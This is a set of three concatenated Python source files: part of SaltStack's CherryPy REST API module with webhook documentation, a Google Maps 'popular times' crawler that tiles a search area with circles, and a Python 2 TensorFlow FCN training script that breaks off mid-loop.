# blocks until send is called on the parent end of this pipe.
pipe.recv()
with salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=True,
) as event:
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
"data: {}\n\n".format(salt.utils.json.dumps(data)),
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n%s", data
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook:
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason, authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
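For instance, a minimal Python sketch (using the third-party ``requests``
library; the secret header and payload are illustrative) that would produce an
event tagged ``salt/netapi/hook/mycompany/build/success`` like the one shown
further below:

.. code-block:: python

    import requests  # third-party HTTP client; assumed to be installed

    requests.post(
        "https://localhost:8000/hook/mycompany/build/success",
        # Hypothetical secret header that a Reactor SLS can validate later
        headers={"X-My-Secret-Key": "F0fAgoQjIT@W"},
        json={"revision": "aa22a3c4b2e7", "result": True},
        verify=False,  # example only; use a valid certificate in production
    )
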
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
# Keep lowdata processing enabled so JSON and urlencoded hook payloads are unserialized
"tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ build.revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats:
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App:
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API:
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
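# A minimal usage sketch (not part of this module): how the returned app and
# config might be mounted when embedding the API in a standalone CherryPy
# process. "opts" is assumed to be an already-loaded Salt master configuration
# containing a "rest_cherrypy" section.
#
#     root, apiopts, cpyopts = get_app(opts)
#     cherrypy.tree.mount(root, "/", cpyopts)
#     cherrypy.engine.start()
#     cherrypy.engine.block()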
|
crawler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import calendar
import datetime
import json
import logging
import math
import re
import ssl
import threading
import urllib.request
import urllib.parse
from time import sleep, time
from queue import Queue
import requests
from geopy import Point
from geopy.distance import vincenty, VincentyDistance
# urls for google api web service
BASE_URL = "https://maps.googleapis.com/maps/api/place/"
RADAR_URL = BASE_URL + "radarsearch/json?location={},{}&radius={}&types={}&key={}"
NEARBY_URL = BASE_URL + "nearbysearch/json?location={},{}&radius={}&types={}&key={}"
DETAIL_URL = BASE_URL + "details/json?placeid={}&key={}"
# user agent for populartimes request
USER_AGENT = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/54.0.2840.98 Safari/537.36"}
class PopulartimesException(Exception):
"""Exception raised for errors in the input.
Attributes:
expression -- input expression in which the error occurred
message -- explanation of the error
"""
def __init__(self, expression, message):
self.expression = expression
self.message = message
def rect_circle_collision(rect_left, rect_right, rect_bottom, rect_top, circle_x, circle_y, radius):
# returns true iff circle intersects rectangle
def clamp(val, min, max):
# limits value to the range min..max
if val < min:
return min
if val > max:
return max
return val
    # Find the closest point to the circle within the rectangle
    closest_x = clamp(circle_x, rect_left, rect_right)
    closest_y = clamp(circle_y, rect_bottom, rect_top)
    # Calculate the distance between the circle's center and this closest point
    dist_x = circle_x - closest_x
    dist_y = circle_y - closest_y
    # If the distance is less than the circle's radius, an intersection occurs
    dist_sq = (dist_x * dist_x) + (dist_y * dist_y)
    return dist_sq < (radius * radius)
def cover_rect_with_circles(w, h, r):
"""
fully cover a rectangle of given width and height with
circles of radius r. This algorithm uses a hexagonal
honeycomb pattern to cover the area.
:param w: width of rectangle
    :param h: height of rectangle
:param r: radius of circles
:return: list of circle centers (x,y)
"""
#initialize result list
res = []
# horizontal distance between circle centers
x_dist = math.sqrt(3) * r
# vertical distance between circle centers
y_dist = 1.5 * r
# number of circles per row (different for even/odd rows)
cnt_x_even = math.ceil(w / x_dist)
cnt_x_odd = math.ceil((w - x_dist/2) / x_dist) + 1
# number of rows
cnt_y = math.ceil((h-r) / y_dist) + 1
y_offs = 0.5 * r
for y in range(cnt_y):
if y % 2 == 0:
# shift even rows to the right
x_offs = x_dist/2
cnt_x = cnt_x_even
else:
x_offs = 0
cnt_x = cnt_x_odd
for x in range(cnt_x):
res.append((x_offs + x*x_dist, y_offs + y*y_dist))
# top-right circle is not always required
if res and not rect_circle_collision(0, w, 0, h, res[-1][0], res[-1][1], r):
res = res[0:-1]
return res
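# Geometry note: a circle of radius r fully covers the regular hexagon inscribed
# in it, whose width across the flats is sqrt(3) * r and whose rows stack 1.5 * r
# apart; that is where the x_dist and y_dist spacings above come from.
# Illustrative call (arbitrary values, doctest-style):
#
#     >>> centers = cover_rect_with_circles(100, 100, 60)
#     >>> len(centers) > 0
#     True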
def get_circle_centers(b1, b2, radius):
"""
the function covers the area within the bounds with circles
:param b1: south-west bounds [lat, lng]
:param b2: north-east bounds [lat, lng]
:param radius: specified radius, adapt for high density areas
:return: list of circle centers that cover the area between lower/upper
"""
sw = Point(b1)
ne = Point(b2)
# north/east distances
dist_lat = vincenty(Point(sw[0], sw[1]), Point(ne[0], sw[1])).meters
dist_lng = vincenty(Point(sw[0], sw[1]), Point(sw[0], ne[1])).meters
    circles = cover_rect_with_circles(dist_lat, dist_lng, radius)
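    # project each local offset back onto the globe: move c[1] metres east of the
    # south-west corner, then c[0] metres north of that intermediate point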
cords = [
VincentyDistance(meters=c[0])
.destination(
VincentyDistance(meters=c[1])
.destination(point=sw, bearing=90),
bearing=0
)[:2]
for c in circles
]
return cords
def worker_radar():
"""
worker that gets coordinates of queue and starts radar search
:return:
"""
while True:
item = q_radar.get()
get_radar(item)
q_radar.task_done()
def get_radar(item):
_lat, _lng = item["pos"]
# places - nearby search
# https://developers.google.com/places/web-service/search?hl=en#PlaceSearchRequests
radar_str = NEARBY_URL.format(
_lat, _lng, params["radius"], "|".join(params["type"]), params["API_key"]
)
# is this a next page request?
if item["res"] > 0:
# possibly wait remaining time until next_page_token becomes valid
min_wait = 2 # wait at least 2 seconds before the next page request
sec_passed = time() - item["last_req"]
if sec_passed < min_wait:
sleep(min_wait - sec_passed)
radar_str += "&pagetoken=" + item["next_page_token"]
resp = json.loads(requests.get(radar_str, auth=('user', 'pass')).text)
check_response_code(resp)
radar = resp["results"]
item["res"] += len(radar)
if item["res"] >= 60:
logging.warning("Result limit in search radius reached, some data may get lost")
bounds = params["bounds"]
# retrieve google ids for detail search
for place in radar:
geo = place["geometry"]["location"]
if bounds["lower"]["lat"] <= geo["lat"] <= bounds["upper"]["lat"] \
and bounds["lower"]["lng"] <= geo["lng"] <= bounds["upper"]["lng"]:
            # this isn't thread safe, but we don't really care,
            # since in the worst case a dict entry is simply overwritten
g_places[place["place_id"]] = place
# if there are more results, schedule next page requests
if "next_page_token" in resp:
item["next_page_token"] = resp["next_page_token"]
item["last_req"] = time()
q_radar.put(item)
def worker_detail():
"""
worker that gets item of queue and starts detailed data retrieval
:return:
"""
while True:
item = q_detail.get()
get_detail(item)
q_detail.task_done()
def get_popularity_for_day(popularity):
"""
Returns popularity for day
:param popularity:
:return:
"""
# Initialize empty matrix with 0s
pop_json = [[0 for _ in range(24)] for _ in range(7)]
wait_json = [[0 for _ in range(24)] for _ in range(7)]
for day in popularity:
day_no, pop_times = day[:2]
if pop_times:
for hour_info in pop_times:
hour = hour_info[0]
pop_json[day_no - 1][hour] = hour_info[1]
                # check if the waiting string is available and convert to minutes
if len(hour_info) > 5:
wait_digits = re.findall(r'\d+', hour_info[3])
if len(wait_digits) == 0:
wait_json[day_no - 1][hour] = 0
elif "min" in hour_info[3]:
wait_json[day_no - 1][hour] = int(wait_digits[0])
elif "hour" in hour_info[3]:
wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60
else:
wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60 + int(wait_digits[1])
# day wrap
if hour_info[0] == 23:
day_no = day_no % 7 + 1
ret_popularity = [
{
"name": list(calendar.day_name)[d],
"data": pop_json[d]
} for d in range(7)
]
# waiting time only if applicable
ret_wait = [
{
"name": list(calendar.day_name)[d],
"data": wait_json[d]
} for d in range(7)
] if any(any(day) for day in wait_json) else []
# {"name" : "monday", "data": [...]} for each weekday as list
return ret_popularity, ret_wait
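# Doctest-style example with hypothetical input (each entry has the shape
# [day_no, [[hour, popularity, ...], ...]] that the loop above expects):
#
#     >>> pop, wait = get_popularity_for_day([[1, [[18, 80], [19, 65]]]])
#     >>> pop[0]["name"], pop[0]["data"][18], wait
#     ('Monday', 80, [])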
def index_get(array, *argv):
"""
    checks if an index is available in the array and returns it
:param array: the data array
:param argv: index integers
:return: None if not available or the return value
"""
try:
for index in argv:
array = array[index]
return array
# there is either no info available or no popular times
    # TypeError: rating/rating_n/populartimes wrong or not available
except (IndexError, TypeError):
return None
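# Example: index_get([[1, 2], [3]], 1, 0) returns 3, while an out-of-range chain
# such as index_get([[1, 2]], 0, 5) returns None instead of raising.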
def add_optional_parameters(detail_json, detail, rating, rating_n, popularity, current_popularity, time_spent):
"""
check for optional return parameters and add them to the result json
:param detail_json:
:param detail:
:param rating:
:param rating_n:
:param popularity:
:param current_popularity:
:param time_spent:
:return:
"""
if rating:
detail_json["rating"] = rating
elif "rating" in detail:
detail_json["rating"] = detail["rating"]
if rating_n:
detail_json["rating_n"] = rating_n
if "international_phone_number" in detail:
detail_json["international_phone_number"] = detail["international_phone_number"]
if current_popularity:
detail_json["current_popularity"] = current_popularity
if popularity:
popularity, wait_times = get_popularity_for_day(popularity)
detail_json["populartimes"] = popularity
if wait_times:
detail_json["time_wait"] = wait_times
if time_spent:
detail_json["time_spent"] = time_spent
return detail_json
def get_populartimes_from_search(place_identifier):
"""
request information for a place and parse current popularity
:param place_identifier: name and address string
:return:
"""
params_url = {
"tbm": "map",
"tch": 1,
"hl": "en",
"q": urllib.parse.quote_plus(place_identifier),
"pb": "!4m12!1m3!1d4005.9771522653964!2d-122.42072974863942!3d37.8077459796541!2m3!1f0!2f0!3f0!3m2!1i1125!2i976"
"!4f13.1!7i20!10b1!12m6!2m3!5m1!6e2!20e3!10b1!16b1!19m3!2m2!1i392!2i106!20m61!2m2!1i203!2i100!3m2!2i4!5b1"
"!6m6!1m2!1i86!2i86!1m2!1i408!2i200!7m46!1m3!1e1!2b0!3e3!1m3!1e2!2b1!3e2!1m3!1e2!2b0!3e3!1m3!1e3!2b0!3e3!"
"1m3!1e4!2b0!3e3!1m3!1e8!2b0!3e3!1m3!1e3!2b1!3e2!1m3!1e9!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1!3e2!1m3!1e"
"10!2b0!3e4!2b1!4b1!9b0!22m6!1sa9fVWea_MsX8adX8j8AE%3A1!2zMWk6Mix0OjExODg3LGU6MSxwOmE5ZlZXZWFfTXNYOGFkWDh"
"qOEFFOjE!7e81!12e3!17sa9fVWea_MsX8adX8j8AE%3A564!18e15!24m15!2b1!5m4!2b1!3b1!5b1!6b1!10m1!8e3!17b1!24b1!"
"25b1!26b1!30m1!2b1!36b1!26m3!2m2!1i80!2i92!30m28!1m6!1m2!1i0!2i0!2m2!1i458!2i976!1m6!1m2!1i1075!2i0!2m2!"
"1i1125!2i976!1m6!1m2!1i0!2i0!2m2!1i1125!2i20!1m6!1m2!1i0!2i956!2m2!1i1125!2i976!37m1!1e81!42b1!47m0!49m1"
"!3b1"
}
search_url = "https://www.google.de/search?" + "&".join(k + "=" + str(v) for k, v in params_url.items())
logging.info("searchterm: " + search_url)
# noinspection PyUnresolvedReferences
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
resp = urllib.request.urlopen(urllib.request.Request(url=search_url, data=None, headers=USER_AGENT),
context=gcontext)
data = resp.read().decode('utf-8').split('/*""*/')[0]
# find eof json
jend = data.rfind("}")
if jend >= 0:
data = data[:jend + 1]
jdata = json.loads(data)["d"]
jdata = json.loads(jdata[4:])
# get info from result array, has to be adapted if backend api changes
info = index_get(jdata, 0, 1, 0, 14)
rating = index_get(info, 4, 7)
rating_n = index_get(info, 4, 8)
popular_times = index_get(info, 84, 0)
# current_popularity is also not available if popular_times isn't
current_popularity = index_get(info, 84, 7, 1)
time_spent = index_get(info, 117, 0)
# extract wait times and convert to minutes
if time_spent:
nums = [float(f) for f in re.findall(r'\d*\.\d+|\d+', time_spent.replace(",", "."))]
contains_min, contains_hour = "min" in time_spent, "hour" in time_spent or "hr" in time_spent
time_spent = None
if contains_min and contains_hour:
time_spent = [nums[0], nums[1] * 60]
elif contains_hour:
time_spent = [nums[0] * 60, (nums[0] if len(nums) == 1 else nums[1]) * 60]
elif contains_min:
time_spent = [nums[0], nums[0] if len(nums) == 1 else nums[1]]
time_spent = [int(t) for t in time_spent]
return rating, rating_n, popular_times, current_popularity, time_spent
def get_detail(place_id):
"""
    loads detail data for the given place id
:return:
"""
global results
# detail_json = get_populartimes(params["API_key"], place_id)
detail_json = get_populartimes_by_detail(params["API_key"], g_places[place_id])
if params["all_places"] or "populartimes" in detail_json:
results.append(detail_json)
def get_populartimes(api_key, place_id):
"""
sends request to detail to get a search string
and uses standard proto buffer to get additional information
on the current status of popular times
:return: json details
"""
# places api - detail search
# https://developers.google.com/places/web-service/details?hl=de
detail_str = DETAIL_URL.format(place_id, api_key)
resp = json.loads(requests.get(detail_str, auth=('user', 'pass')).text)
check_response_code(resp)
detail = resp["result"]
return get_populartimes_by_detail(api_key, detail)
def get_populartimes_by_detail(api_key, detail):
address = detail["formatted_address"] if "formatted_address" in detail else detail["vicinity"]
place_identifier = "{} {}".format(detail["name"], address)
detail_json = {
"id": detail["place_id"],
"name": detail["name"],
"address": address,
"types": detail["types"],
"coordinates": detail["geometry"]["location"]
}
detail_json = add_optional_parameters(detail_json, detail, *get_populartimes_from_search(place_identifier))
return detail_json
def check_response_code(resp):
"""
    check if query quota has been surpassed or other errors occurred
:param resp: json response
:return:
"""
if resp["status"] == "OK" or resp["status"] == "ZERO_RESULTS":
return
if resp["status"] == "REQUEST_DENIED":
raise PopulartimesException("Google Places " + resp["status"],
"Request was denied, the API key is invalid.")
if resp["status"] == "OVER_QUERY_LIMIT":
raise PopulartimesException("Google Places " + resp["status"],
"You exceeded your Query Limit for Google Places API Web Service, "
"check https://developers.google.com/places/web-service/usage "
"to upgrade your quota.")
if resp["status"] == "INVALID_REQUEST":
raise PopulartimesException("Google Places " + resp["status"],
"The query string is malformed, "
"check if your formatting for lat/lng and radius is correct.")
if resp["status"] == "INVALID_REQUEST":
raise PopulartimesException("Google Places " + resp["status"],
"The query string is malformed, "
"check if your formatting for lat/lng and radius is correct.")
if resp["status"] == "NOT_FOUND":
raise PopulartimesException("Google Places " + resp["status"],
"The place ID was not found and either does not exist or was retired.")
raise PopulartimesException("Google Places " + resp["status"],
"Unidentified error with the Places API, please check the response code")
def run(_params):
"""
wrap execution logic in method, for later external call
:return:
"""
global params, g_places, q_radar, q_detail, results
start = datetime.datetime.now()
# shared variables
params = _params
q_radar, q_detail = Queue(), Queue()
g_places, results = dict(), list()
logging.info("Adding places to queue...")
# threading for radar search
for i in range(params["n_threads"]):
t = threading.Thread(target=worker_radar)
t.daemon = True
t.start()
# cover search area with circles
bounds = params["bounds"]
for lat, lng in get_circle_centers([bounds["lower"]["lat"], bounds["lower"]["lng"]], # southwest
[bounds["upper"]["lat"], bounds["upper"]["lng"]], # northeast
params["radius"]):
q_radar.put(dict(pos=(lat, lng), res=0))
q_radar.join()
logging.info("Finished in: {}".format(str(datetime.datetime.now() - start)))
logging.info("{} places to process...".format(len(g_places)))
# threading for detail search and popular times
for i in range(params["n_threads"]):
t = threading.Thread(target=worker_detail)
t.daemon = True
t.start()
for g_place_id in g_places:
q_detail.put(g_place_id)
q_detail.join()
logging.info("Finished in: {}".format(str(datetime.datetime.now() - start)))
return results
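# Minimal sketch of the params dict that run() expects; the keys are inferred
# from their use above and the values are placeholders, not working settings:
#
#     results = run({
#         "API_key": "YOUR_GOOGLE_PLACES_KEY",
#         "radius": 180,
#         "type": ["bar", "restaurant"],
#         "bounds": {"lower": {"lat": 48.132, "lng": 11.566},
#                    "upper": {"lat": 48.142, "lng": 11.580}},
#         "n_threads": 10,
#         "all_places": False,
#     })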
|
train.py
|
# --------------------------------------------------------
# FCN
# Copyright (c) 2016 RSE at UW
# Licensed under The MIT License [see LICENSE for details]
# Written by Yu Xiang
# --------------------------------------------------------
"""Train a FCN"""
from fcn.config import cfg
from gt_data_layer.layer import GtDataLayer
from gt_single_data_layer.layer import GtSingleDataLayer
from gt_synthesize_layer.layer import GtSynthesizeLayer
from utils.timer import Timer
import numpy as np
import os
import tensorflow as tf
import sys
import threading
import math
class SolverWrapper(object):
"""A simple wrapper around Caffe's solver.
    This wrapper gives us control over the snapshotting process, which we
use to unnormalize the learned bounding-box regression weights.
"""
def __init__(self, sess, network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None):
"""Initialize the SolverWrapper."""
self.net = network
self.imdb = imdb
self.roidb = roidb
self.output_dir = output_dir
self.pretrained_model = pretrained_model
self.pretrained_ckpt = pretrained_ckpt
# For checkpoint
self.saver = tf.train.Saver(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES), max_to_keep=12)
def snapshot(self, sess, iter):
"""Take a snapshot of the network after unnormalizing the learned
bounding-box regression weights. This enables easy use at test-time.
"""
net = self.net
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
infix = ('_' + cfg.TRAIN.SNAPSHOT_INFIX
if cfg.TRAIN.SNAPSHOT_INFIX != '' else '')
filename = (cfg.TRAIN.SNAPSHOT_PREFIX + infix + '_iter_{:d}'.format(iter+1) + '.ckpt')
filename = os.path.join(self.output_dir, filename)
self.saver.save(sess, filename, write_meta_graph=False)
print 'Wrote snapshot to: {:s}'.format(filename)
def restore(self, session, save_file):
reader = tf.train.NewCheckpointReader(save_file)
saved_shapes = reader.get_variable_to_shape_map()
var_names = sorted([(var.name, var.name.split(':')[0]) for var in tf.global_variables()
if var.name.split(':')[0] in saved_shapes])
var_name_to_var = {var.name : var for var in tf.global_variables()}
restore_vars = []
restored_var_names = set()
print('Restoring:')
with tf.variable_scope(tf.get_variable_scope(), reuse=True):
for var_name, saved_var_name in var_names:
if 'global_step' in var_name:
continue
if 'Variable' in var_name:
continue
curr_var = var_name_to_var[var_name]
var_shape = curr_var.get_shape().as_list()
if var_shape == saved_shapes[saved_var_name]:
restore_vars.append(curr_var)
print(str(saved_var_name))
restored_var_names.add(saved_var_name)
else:
print('Shape mismatch for var', saved_var_name, 'expected', var_shape, 'got', saved_shapes[saved_var_name])
ignored_var_names = sorted(list(set(saved_shapes.keys()) - restored_var_names))
if len(ignored_var_names) == 0:
print('Restored all variables')
else:
print('Did not restore:' + '\n\t'.join(ignored_var_names))
if len(restore_vars) > 0:
saver = tf.train.Saver(restore_vars)
saver.restore(session, save_file)
print('Restored %s' % save_file)
def train_model(self, sess, train_op, loss, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
tf.summary.scalar('loss', loss)
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
        # initialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
print self.pretrained_ckpt
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
summary, loss_value, lr, _ = sess.run([merged, loss, learning_rate, train_op])
train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_vertex(self, sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
        # initialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
# tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_regu, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_regu: %.12f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
